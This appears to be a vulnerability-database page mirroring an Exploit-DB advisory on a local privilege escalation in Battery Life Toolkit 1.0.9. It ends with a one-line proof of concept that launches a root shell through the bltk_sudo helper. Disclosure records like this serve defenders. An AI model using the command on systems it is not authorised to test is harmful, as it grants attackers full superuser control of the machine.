Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059119 漏洞类型
发布时间 2010-01-28 更新时间 2010-01-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/33576
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/37996/info

Battery Life Toolkit (BLTK) is prone to a local privilege-escalation vulnerability.

A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in the complete compromise of the affected computer.

This issue affects BLTK 1.0.9; other versions may be vulnerable as well.

The following proof of concept is available:

/usr/lib/bltk/bin/bltk_sudo /bin/bash